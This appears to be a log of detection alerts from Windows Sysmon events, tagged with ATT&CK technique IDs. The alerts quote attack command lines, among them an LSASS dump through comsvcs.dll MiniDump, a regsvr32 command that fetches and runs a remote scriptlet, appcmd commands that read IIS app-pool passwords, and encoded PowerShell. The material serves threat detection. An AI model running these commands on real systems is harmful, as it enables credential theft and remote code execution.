C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 26 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.418 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243550 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.388 + 747F3D96-9F69-5E75-0000-001055912000 + 8160 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process 
(Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.350815,2019-05-27T05:29:17.350815+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5889 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.310 + 365ABB72-3D6D-5CEB-0000-00109767FF00 + 3096 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational 
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243550 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.388 + 747F3D96-9F69-5E75-0000-001055912000 + 8160 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1584827104.923222,2020-03-22T01:45:04.923222+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 244866 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 21:45:04.909 + 747F3D96-8AE0-5E76-0000-0010933B8003 + 7708 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" + c:\Users\Public\ + MSEDGEWIN10\IEUser + 747F3D96-06A4-5E76-0000-002087DE0200 + 0x2de87 + 1 + Medium 
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-06AA-5E76-0000-001046E10400 + 4668 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1557770610.556085,2019-05-13T22:03:30.556085+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.128.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 17289 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:20.485 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7 + 49159 + + false + 151.101.128.133 + + 443 + https + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243550 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.388 + 747F3D96-9F69-5E75-0000-001055912000 + 8160 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + 
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 25 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.138 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 25 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.138 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + 
SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.2707,2019-05-27T05:29:17.270700+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5886 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.230 + 365ABB72-3D6D-5CEB-0000-0010D763FF00 + 3240 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 
C:\Windows\System32\notepad.bin full)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + 
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," 
+ + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + 
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003.001] Credential dump Thread Open to Lsass,1601297256.206545,2020-09-28T16:47:36.206545+04:00,,Threat,Critical,Process ( C:\Windows\System32\rdrleakdiag.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," + + + + + 8 + 2 + 4 + 8 + 0 + 0x8000000000000000 + + + 5227 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-PIU87N6 + + + + + + 2020-09-28 12:47:36.204 + BC47D85C-DB68-5F71-0000-0010B237AB01 + 3352 + C:\Windows\System32\rdrleakdiag.exe + BC47D85C-FAA9-5F68-0000-0010D9590000 + 668 + C:\Windows\System32\lsass.exe + 3468 + 0x00007FF8C72C5EC0 + C:\WINDOWS\SYSTEM32\ntdll.dll + + +",DESKTOP-PIU87N6,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.190585,2019-05-27T05:29:17.190585+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5883 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.150 + 365ABB72-3D6D-5CEB-0000-00101760FF00 + 2104 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 
365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 24 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 17:00:09.677 + 365ABB72-AD19-5CB8-0000-0010F4F40C00 + 3980 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 
+ 1 + 0 + 0x8000000000000000 + + + 24 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 17:00:09.677 + 365ABB72-AD19-5CB8-0000-0010F4F40C00 + 3980 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17287 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.497 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-00201D340100 + 0x1341d + 1 + Medium + 
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17287 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.497 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-00201D340100 + 0x1341d + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 
